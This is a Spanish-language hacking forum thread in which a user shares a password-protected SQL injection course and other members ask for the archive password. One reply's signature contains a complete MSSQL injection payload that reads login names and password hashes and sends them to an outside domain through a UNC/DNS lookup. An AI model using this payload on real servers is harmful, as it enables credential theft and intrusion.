Inyección SQL by N0rf

Iniciado por Jscript32, Septiembre 16, 2016, 09:59:41 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 16, 2016, 09:59:41 AM Ultima modificación: Septiembre 04, 2017, 09:58:06 PM por xyz

+ ----------------- +
| explicación |
+ ----------------- +
¡Hola gente! Mi nombre es n0rf y voy a enseñarte inyección SQL!

La mayoría de los sitios web que contienen los inicios de sesión o cualquier tipo de tienda de fecha de usuario estos datos en una base de datos. Una base de datos es un montón de tablas que tienen un montón de columnas que tienen un montón de información.

base de datos de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podría tener tablas con columnas: usuario, contraseña, gmail_email ...

Los sitios que son vulnerables a la inyección de SQL permiten a los hackers para leer las bases de datos y el uso de la información para que sea!

EL archivo está en 4 partes en INGLES:

Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
CONTRASEÑA: Reverse AES: YNcfzOrccI+aLnd/I5Ggh9S7cA5cQw8vj9x3EHeHUxXbSZQj5lzKa35s4ZtGbvv7


Contraseña en claro: jscriptputoamo

Espero que os sirva este aporte
Java System

Alguien ha podido probar este cursito? vale la pena?

 :o :o :o :o yo pensaba que te llamabas Jscript32 pero nada, si eres n0rf, no seré yo quien le lleve la contraria a alguien con doble personalidad. ;D ;D ;D


Perdón por adelantado por que no es un comentario productivo pero es pronto y casi no he dormido así que tengo el humor tonto.

saludos n0rf


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
alguien tiene el pass?

CONTRASEÑA: Reverse AES: YNcfzOrccI+aLnd/I5Ggh9S7cA5cQw8vj9x3EHeHUxXbSZQj5lzKa35s4ZtGbvv7

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
alguien tiene el pass?

There is no one more blind than he refuses to see.
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podes poner la pass en texto plano para no tener que eliminar tu post?

Saludos,
ANTRAX


Buenas.

Se actualizó el post con la contraseña en texto claro.

Un saludo !